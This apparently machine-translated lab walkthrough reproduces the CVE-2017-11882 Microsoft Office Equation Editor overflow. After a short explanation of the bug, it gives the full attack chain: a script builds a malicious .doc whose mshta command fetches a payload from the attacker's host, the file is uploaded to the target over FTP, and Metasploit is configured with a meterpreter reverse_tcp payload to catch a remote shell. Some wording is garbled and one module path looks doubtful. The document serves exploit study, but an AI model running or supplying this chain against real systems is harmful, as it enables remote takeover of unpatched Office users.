Office Remote Code Execution Vulnerability (CVE-2017-11882) Vulnerability Reappears
- 1. Vulnerability principle
- 2. View the exploit file on the Kali platform
- 3. Log in to the target machine and open the FTP server
- 4. Log in to Kali and use the FTP server to upload the payload-cale.doc file
- 5. Log in to the target machine, trigger the doc file, and verify that there are loopholes
- 6. Log in to the kali platform, execute the command, and generate a doc document containing the attack code
- 7. Start and configure metapsloit on the kali platform
- 8. Double-click the payloadattack.doc document on the target platform to trigger the vulnerability
1. Vulnerability principle
CVE-2017-11882 allows an attacker to run arbitrary code in the context of the current user, resulting in the inability to properly handle objects in memory, which is "Microsoft Office Memory Corruption Vulnerability", a remote execution vulnerability for stack overflow
The vulnerability is EQNEDT32.EXE
caused by a buffer overflow in the component. When a victim user opens an Office document, the vulnerability may be exploited, causing great harm. The reason is due to EQNEDT32.EXE
the process reading in ole data which contains MathType. The size allocated by the function to the Font Name data is 0x24 bytes, if the size is exceeded, the stack buffer will overflow. However, the program did not verify its length when copying the formula Font Name data, which led to the occurrence of vulnerabilities
Kill the following versions of Office that are not updated:
- Microsoft Office 2000
- Microsoft Office 2003
- Microsoft Office 2007 Service Pack 3
- Microsoft Office 2010 Service Pack 2
- Microsoft Office 2013 Service Pack 1
- Microsoft Office 2016
- MicrosoftOffice 365
Vulnerability environment:
攻击机:Kali(10.10.0.11)
工具:metasploit
目标靶机:Windows2008 (10.10.0.9)
工具:Office软件、Ftpserver
2. View the exploit file on the Kali platform
Payload file (doc file) ready to attack:
This file is generated by Github's CVE-2017-11882.py
attack script
python CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o payload-cale.doc
Its function is to open the office text and pop up the computer program at the same time. This experiment uses this text to verify whether there is an Office remote code execution vulnerability (CVE-2017-11882) vulnerability on the target machine.
3. Log in to the target machine and open the FTP server
Open the FTP server. Click the green button on the far left to start the ftp server:
The following changes can be seen: The ftp server starts. "FTP service online" is displayed. The FTP file directory is on the desktop of the target machine
4. Log in to Kali and use the FTP server to upload the payload-cale.doc file
Switch to the root account on the Kali terminal, and then use the ftp tool to connect to the target machine service:
After successfully logging in to ftp, upload the payload-cale.doc file to the target target machine windows2008 through the command
put /home/college/CVE-2017-11882-payload/payload-cale.doc /payload-cale.doc
5. Log in to the target machine, trigger the doc file, and verify that there are loopholes
6. Log in to the kali platform, execute the command, and generate a doc document containing the attack code
python CVE-2017-11882.py -c "mshta http://10.10.0.11:8080/payload" -o payloadattack.doc
Use the FTP service to upload files to the target machine:
7. Start and configure metapsloit on the kali platform
start up:
msfconsole
Find the CVE-2017-11882 vulnerability:
search CVE-2017-11882
Load the attack exploit program, set the payload and various parameters:
use exploit/windows/smb/CVE-2017-11882
Set the payload to rebound tcp:
set payload windows/meterpreter/reverse_tcp
Set the local machine address:
set lhost 10.10.0.11
Set the path of the uri:
set URIPATH payload
After running the payload and starting the exploit, msf will listen to port 8080 of the machine, and when the target machine accesses it 10.10.0.11:8080/payload
, it will bounce back to the tcp session on port 4444 when the link is opened.
Initiate a vulnerability attack:
exploit -j
8. Double-click the payloadattack.doc document on the target platform to trigger the vulnerability
On the desktop of the target machine, you can see the file uploaded by ftp in the previous step, double-click to open this file, and the connection can be established